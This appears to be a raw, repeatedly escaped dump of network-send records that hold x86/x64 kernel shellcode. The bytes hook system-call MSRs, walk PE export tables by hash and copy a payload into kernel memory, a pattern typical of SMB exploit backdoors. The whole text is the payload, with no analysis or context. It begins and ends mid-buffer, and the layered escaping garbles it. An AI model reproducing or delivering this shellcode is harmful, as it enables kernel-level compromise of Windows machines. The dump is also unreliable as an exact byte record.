\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\
\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 9, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\
\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\
\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\